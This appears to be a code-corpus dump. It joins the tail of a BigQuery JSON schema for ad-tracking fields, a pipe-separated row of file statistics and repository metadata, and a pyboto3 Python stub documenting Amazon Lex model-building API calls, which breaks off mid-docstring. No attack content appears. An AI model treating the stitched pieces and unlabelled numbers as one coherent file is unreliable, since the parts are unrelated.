{ "name":"Floodlight_Variable_58", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_59", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_60", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_61", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_62", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_63", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_64", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_65", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_66", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_67", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_68", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_69", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_70", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_71", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_72", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_73", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_74", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_75", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_76", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_77", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_78", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_79", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_80", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_81", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_82", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_83", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_84", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_85", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_86", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_87", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_88", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_89", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_90", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_91", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_92", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_93", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_94", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_95", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_96", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_97", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_98", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_99", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_100", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Has_Backup_Image", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Counters", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Exits", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Timers", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Dynamic_Impressions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Expansions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Full_Screen_Impressions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Full_Screen_Video_Completions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Full_Screen_Video_Plays", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Full_Screen_Views", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Html5_Impressions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Interactive_Impressions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Manual_Closes", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Companion_Clicks", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Completions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_First_Quartile_Completions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Full_Screen", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Interactions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Midpoints", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Mutes", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Pauses", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Plays", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Progress_Events", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Replays", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Skips", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Stops", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Third_Quartile_Completions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Unmutes", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Views", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Hour", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Hours_Since_Attributed_Interaction", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Hours_Since_First_Interaction", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Impression_Count", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Channel", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Click_Tracker", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Mobile_Rich_Media", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Mobile_Static_Image", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Mobile_Video", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Natural_Search", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Paid_Search", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Rich_Media", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Static_Image", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Video", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Mobile_Carrier", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Month", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Engine_Country", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Engine_Property", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Engine_Url", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Landing_Page", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Landing_Page_Query_String", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Processed_Landing_Page", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Processed_Landing_Page_Query_String", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Query", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Num_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Operating_System", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Operating_System_Version", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Ord_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Package_Roadblock", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Package_Roadblock_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Package_Roadblock_Strategy", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Ad", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Ad_Group", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Ad_Group_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Ad_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Advertiser", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Advertiser_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Agency", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Agency_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Bid_Strategy", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Bid_Strategy_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Campaign", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Campaign_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Engine_Account", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Engine_Account_Category", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Engine_Account_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_External_Ad_Group_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_External_Ad_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_External_Campaign_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_External_Keyword_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Keyword", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Keyword_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Labels", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Landing_Page_Url", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Legacy_Keyword_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Match_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Path_Length", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Path_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Placement", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Placement_End_Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Placement_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Placement_Pixel_Size", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Placement_Start_Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Platform_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Rendering_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Video_Length", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Site_Dcm", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Site_Site_Directory", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Site_Id_Site_Directory", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Site_Id_Dcm", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Site_Keyname", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Rich_Media_Standard_Event_Count", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Rich_Media_Standard_Event_Path_Summary", "type":"STRING", "mode":"NULLABLE" },
{ "name":"State_Region", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Tran_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"U_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Week", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Zip_Postal_Code", "type":"INTEGER", "mode":"NULLABLE" }
] | 72.026316 | 102 | 0.635687 | 2,437 | 21,896 | 5.448092 | 0.126385 | 0.256684 | 0.341041 | 0.346313 | 0.904346 | 0.875951 | 0.759735 | 0.293515 | 0.214356 | 0.099495 | 0 | 0.012531 | 0.096136 | 21,896 | 304 | 103 | 72.026316 | 0.65833 | 0.025484 | 0 | 0 | 0 | 0 | 0.635037 | 0.220338 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
70faa86f4e03080de0c33afb300c623990803d92 | 236,252 | py | Python | pyboto3/lexmodelbuildingservice.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 91 | 2016-12-31T11:38:37.000Z | 2021-09-16T19:33:23.000Z | pyboto3/lexmodelbuildingservice.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 7 | 2017-01-02T18:54:23.000Z | 2020-08-11T13:54:02.000Z | pyboto3/lexmodelbuildingservice.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 26 | 2016-12-31T13:11:00.000Z | 2022-03-03T21:01:12.000Z | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_bot_version(name=None, checksum=None):
"""
Creates a new version of the bot based on the $LATEST version. If the $LATEST version of this resource hasn\'t changed since you created the last version, Amazon Lex doesn\'t create a new version. It returns the last created version.
When you create the first version of a bot, Amazon Lex sets the version to 1. Subsequent versions increment by 1. For more information, see versioning-intro .
This operation requires permission for the lex:CreateBotVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.create_bot_version(
name='string',
checksum='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot that you want to create a new version of. The name is case sensitive.\n
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version of the bot. If you specify a checksum and the $LATEST version of the bot has a different checksum, a PreconditionFailedException exception is returned and Amazon Lex doesn\'t publish a new version. If you don\'t specify a checksum, Amazon Lex publishes the $LATEST version.
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'detectSentiment': True|False
}
Response Structure
(dict) --
name (string) --
The name of the bot.
description (string) --
A description of the bot.
intents (list) --
An array of Intent objects. For more information, see PutBot .
(dict) --
Identifies the specific version of an intent.
intentName (string) --
The name of the intent.
intentVersion (string) --
The version of the intent.
clarificationPrompt (dict) --
The message that Amazon Lex uses when it doesn\'t understand the user\'s request. For more information, see PutBot .
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
abortStatement (dict) --
The message that Amazon Lex uses to abort a conversation. For more information, see PutBot .
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
status (string) --
When you send a request to create or update a bot, Amazon Lex sets the status response element to BUILDING . After Amazon Lex builds the bot, it sets status to READY . If Amazon Lex can\'t build the bot, it sets status to FAILED . Amazon Lex returns the reason for the failure in the failureReason response element.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to build the bot.
lastUpdatedDate (datetime) --
The date when the $LATEST version of this bot was updated.
createdDate (datetime) --
The date when the bot version was created.
idleSessionTTLInSeconds (integer) --
The maximum time in seconds that Amazon Lex retains the data gathered in a conversation. For more information, see PutBot .
voiceId (string) --
The Amazon Polly voice ID that Amazon Lex uses for voice interactions with the user.
checksum (string) --
Checksum identifying the version of the bot that was created.
version (string) --
The version of the bot.
locale (string) --
Specifies the target locale for the bot.
childDirected (boolean) --
For each Amazon Lex bot created with the Amazon Lex Model Building Service, you must specify whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to the Children\'s Online Privacy Protection Act (COPPA) by specifying true or false in the childDirected field. By specifying true in the childDirected field, you confirm that your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. By specifying false in the childDirected field, you confirm that your use of Amazon Lex is not related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. You may not specify a default value for the childDirected field that does not accurately reflect whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA.
If your use of Amazon Lex relates to a website, program, or other application that is directed in whole or in part, to children under age 13, you must obtain any required verifiable parental consent under COPPA. For information regarding the use of Amazon Lex in connection with websites, programs, or other applications that are directed or targeted, in whole or in part, to children under age 13, see the Amazon Lex FAQ.
detectSentiment (boolean) --
Indicates whether utterances entered by the user should be sent to Amazon Comprehend for sentiment analysis.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
:return: {
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'detectSentiment': True|False
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
"""
pass
def create_intent_version(name=None, checksum=None):
"""
Creates a new version of an intent based on the $LATEST version of the intent. If the $LATEST version of this intent hasn\'t changed since you last updated it, Amazon Lex doesn\'t create a new version. It returns the last version you created.
When you create a version of an intent, Amazon Lex sets the version to 1. Subsequent versions increment by 1. For more information, see versioning-intro .
This operation requires permissions to perform the lex:CreateIntentVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.create_intent_version(
name='string',
checksum='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent that you want to create a new version of. The name is case sensitive.\n
:type checksum: string
:param checksum: Checksum of the $LATEST version of the intent that should be used to create the new version. If you specify a checksum and the $LATEST version of the intent has a different checksum, Amazon Lex returns a PreconditionFailedException exception and doesn\'t publish a new version. If you don\'t specify a checksum, Amazon Lex publishes the $LATEST version.
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string'
}
Response Structure
(dict) --
name (string) --
The name of the intent.
description (string) --
A description of the intent.
slots (list) --
An array of slot types that defines the information required to fulfill the intent.
(dict) --
Identifies the version of a specific slot.
name (string) --
The name of the slot.
description (string) --
A description of the slot.
slotConstraint (string) --
Specifies whether the slot is required or optional.
slotType (string) --
The type of the slot, either a custom slot type that you defined or one of the built-in slot types.
slotTypeVersion (string) --
The version of the slot type.
valueElicitationPrompt (dict) --
The prompt that Amazon Lex uses to elicit the slot value from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
priority (integer) --
Directs Lex the order in which to elicit this slot value from the user. For example, if the intent has two slots with priorities 1 and 2, AWS Lex first elicits a value for the slot with priority 1.
If multiple slots share the same priority, the order in which Lex elicits values is arbitrary.
sampleUtterances (list) --
If you know a specific pattern with which users might respond to an Amazon Lex request for a slot value, you can provide those utterances to improve accuracy. This is optional. In most cases, Amazon Lex is capable of understanding user utterances.
(string) --
responseCard (string) --
A set of possible responses for the slot type used by text-based clients. A user chooses an option from the response card, instead of using text to reply.
obfuscationSetting (string) --
Determines whether a slot is obfuscated in conversation logs and stored utterances. When you obfuscate a slot, the value is replaced by the slot name in curly braces ({}). For example, if the slot name is "full_name", obfuscated values are replaced with "{full_name}". For more information, see Slot Obfuscation .
sampleUtterances (list) --
An array of sample utterances configured for the intent.
(string) --
confirmationPrompt (dict) --
If defined, the prompt that Amazon Lex uses to confirm the user\'s intent before fulfilling it.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in confirmationPrompt , Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
followUpPrompt (dict) --
If defined, Amazon Lex uses this prompt to solicit additional user activity after the intent is fulfilled.
prompt (dict) --
Prompts for information from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in the prompt field, Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
conclusionStatement (dict) --
After the Lambda function specified in the fulfillmentActivity field fulfills the intent, Amazon Lex conveys this statement to the user.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
dialogCodeHook (dict) --
If defined, Amazon Lex invokes this Lambda function for each user input.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
fulfillmentActivity (dict) --
Describes how the intent is fulfilled.
type (string) --
How the intent should be fulfilled, either by running a Lambda function or by returning the slot data to the client application.
codeHook (dict) --
A description of the Lambda function that is run to fulfill the intent.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
parentIntentSignature (string) --
A unique identifier for a built-in intent.
lastUpdatedDate (datetime) --
The date that the intent was updated.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version number assigned to the new version of the intent.
checksum (string) --
Checksum of the intent version created.
Exceptions
